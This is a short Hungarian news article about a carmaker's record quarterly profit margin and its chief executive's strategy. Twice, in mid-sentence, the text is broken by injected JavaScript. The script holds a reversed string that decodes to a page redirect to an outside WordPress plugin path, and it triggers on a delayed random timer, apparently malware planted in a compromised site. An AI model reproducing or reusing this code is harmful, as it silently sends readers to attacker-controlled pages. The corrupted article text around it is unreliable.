Az árbevétel-arányos nyereségmutató minden korábbinál nagyobb, 12,7 százalék volt, szemben a vállalat előrejelzésében szereplő 10-12 százalékkal. A negyedik negyedévben a félvezetők folyamatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos ellátási nehézségei ellenére 15 százalék volt az árbevétel-arányos nyereségmutató. Ez a társaság közleménye szerint az “árképzésnek, a jó termékösszetételnek és a használt autók kedvező teljesítményének” tulajdonítható. “Továbbra is teljes sebességgel hajtjuk végre stratégiánkat, a világ legértékesebb luxusautó-márkájaként a teljesen elektromos, szoftvervezérelt jövő felé tartunk” – idézte a cég közleménye Ola Källenius igazgatótanácsi elnököt. A svéd szakember 2019 nyarán, hivatali idejének kezdetén még sokkolta a befektetőket egy sor profitfigyelmeztetéssel, újabban viszont rendszeresen felülmúlja az előrejelzéseit – kommentálta az adatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokat…
- Hirdetés -